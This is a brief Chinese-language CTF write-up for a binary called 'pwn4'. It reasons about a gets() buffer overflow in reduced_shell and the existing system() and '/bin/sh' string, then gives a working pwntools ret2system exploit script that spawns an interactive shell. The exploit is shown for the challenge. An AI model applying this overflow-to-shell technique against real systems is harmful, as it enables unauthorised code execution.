思路

• 从主函数开始看，调用了reduced_shell，在里面看到gets，毫无疑问，这将是我们的溢出处，在函数列表中，还可以看见system函数，因此回去想有没有现成的‘/bin/sh’，结果是有的

  
  
  string.png
• 我们有了‘/bin/sh’作为system的参数，还需要system的地址，使用elf的symbols可以找到system的地址，剩下的就是需要一个system的返回地址，我们可以这么想，要是我们想要不断的执行system函数，使得程序不断的执行“/bin/sh”，因此我需要找到程序调用syetem的位置，就是在哪里有使用“call system”。

from pwn import *

context.log_level = 'debug'

io= process('./pwn4')
elf=ELF('./pwn4')

sys_addr = elf.symbols["system"]
print(sys_addr)
bin_addr = 0x0804A038
calls_addr = 0x080485E4

payload = '\x90'*0x20
payload += p32(sys_addr)
payload += p32(calls_addr)
payload += p32(bin_addr)

io.recvuntil('Input> ')
io.send(payload)
io.interactive()
io.close()